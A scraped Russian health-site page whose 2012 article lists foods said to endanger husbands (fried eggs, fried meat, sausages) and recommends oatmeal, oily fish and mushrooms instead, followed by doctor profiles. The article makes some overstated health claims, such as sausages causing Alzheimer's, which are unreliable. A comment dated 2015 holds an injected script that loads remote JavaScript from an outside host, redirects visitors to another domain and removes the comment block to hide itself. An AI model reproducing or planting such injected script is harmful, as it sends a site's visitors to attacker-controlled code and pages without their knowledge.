Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Убить любимого или спасти...  >>  Убить любимого или спасти ему жизнь?
 
Обратная связь
 

Убить любимого или спасти ему жизнь?

Размер шрифта
12 января 2012 03:05
  • google_analytics: false
  • Нравится

Продукты, которые способны убить вашего любимого мужа, вы приносите из магазина практически каждый день. Что делать, чтобы завтрак, обед и ужин стали источником здоровья для вашего единственного?

 /

  1. Жареная яичница

Жареная яичница – враг здоровью мужчины. В одном большом яйце содержится 213 мг холестерина, 84 ккал. В яйцах содержится больше 60% жиров, 1/3 из которых насыщенные. Насыщенные жиры повышают уровень холестерина в крови. А высокий уровень холестерина увеличивает риск сердечного приступа, инсульта и атеросклероза. Кстати, атеросклероз чаще встречается у мужчин старше 35 лет, подверженных частым стрессам.

Что делать

  • Заменить яичницу овсяной кашей. Овсяные зерна – замечательный источник марганца, селена, триптофана, фосфора, витамина B1, магния и белка. Чашка приготовленной овсянки дает больше, чем 6 г протеина.
  • Овсянка защищает от сердечно-сосудистых заболеваний и стимулирует активность в кровяных клетках. Это стабилизирует сахар в крови, понижает риск заболевания диабетом 2-ого типа.
  • Можно добавить в кашу грецкие орехи и льняное семя, в которых омега-3 жирных кислот даже больше, чем в жирной рыбе. Миндаль и изюм богаты бором, который увеличивает уровни тестостерона у мужчин, помогает наращивать мышечную массу и способствует здоровью костей. Кстати, бор также полезен против рака простаты. Лесные орехи и тыквенные семечки содержат стерин, который убивает симптомы доброкачественной простатической гиперплазии.
     
  1. Жареная рыба

В любом жареном мясе много опасных жиров, насыщенных канцерогенами. Они повышают риск сердечных заболеваний, понижают уровень омега-3 кислоты в организме, повышают уровень холестерина. От большого количества жареного мяса повышается риск заболевания раком.

Что делать

Дважды в неделю нужно есть жирную рыбу. Особенно хорош лосось, макрель, форель, тунец, сардины, и сельдь. Эта рыба богата протеином, кальцием, омега-3 жирными кислотами и в них практически нет насыщенных жиров.

Тунец богат такими минералами как селен, магний и калий, витаминами B, включая ниацин, B1 и B6. Лосось – хороший источник B12 и концентрированный источник витамина D.

     
  1. Сосиски

Сосиски очень жирные. В них содержатся нитраты и нитрозамины, которые могут привести к раку и болезни Альцгеймера.

Что делать

Приготовьте грибы: этот продукт – отличный источник цинка, меди, триптофана, калия, фосфора, и витаминов группы B: B2 (рибофлавин), B3 (ниацин), и B5 (пантотеническая кислота). Витамины группы B имеют много полезных свойств: помогают набирать энергию, уменьшают уровень холестерина, стабилизируют уровень крови, координируют нервную систем, помогают в развитии нервных клеток, поддерживают настроение и хорошую работу сердца.

Цинк усиливает действие некоторых гормонов половых желез. Самые высокие концентрации цинка обнаружены в простате и сперме у мужчин.


Cюжеты по теме:
Как убить или спасти любимого мужчину. Какие блюда вы готовите для мужа

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.